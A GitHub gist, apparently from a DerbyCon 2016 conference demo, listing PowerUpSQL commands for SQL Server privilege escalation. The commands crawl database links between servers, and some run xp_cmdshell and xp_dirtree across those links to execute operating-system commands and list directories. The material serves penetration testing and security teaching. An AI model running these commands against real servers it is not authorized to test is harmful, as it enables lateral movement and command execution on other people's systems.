Forked from nullbind/DerbyCon2016 - SQL Server Privilege Escalation Demo - Database Links
Created
May 15, 2020 12:55
-
-
Save eln1x/f69b531fe9f2d659a94966254d8aa8fa to your computer and use it in GitHub Desktop.
DerbyCon2016 - SQL Server Privilege Escalation Demo - Database Links
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Import the module | |
| Import-Module C:\PowerUpSQL-master\scripts\Get-SqlServerLinkCrawl.ps1 | |
| # Crawling Links - this show link paths in output | |
| Get-SqlCrawl -Verbose -Instance MSSQLSRV04.demo.local\SQLSERVER2014 -Export | Export-Clixml C:\PowerUpSQL-master\crawl2.xml | |
| # Crawling Links - this will store link paths in an array so they can be used in differant ways | |
| Get-SqlCrawl -Verbose -Instance MSSQLSRV04.demo.local\SQLSERVER2014 | Export-Clixml C:\PowerUpSQL-master\crawl2.xml | |
| # More Example commands below from Antti Rantasaari | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | select name,version,path,links,user,sysadmin,customquery | format-table | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | where name -ne "Broken Link" | select name,version,path,links,user,sysadmin,customquery | format-table | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "exec master..xp_cmdshell 'whoami'" | format-table | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "exec xp_dirtree 'c:\temp'" -Export | format-table | |
| Get-SQLCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" -Export | where name -ne "broken link" | sort name | Format | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment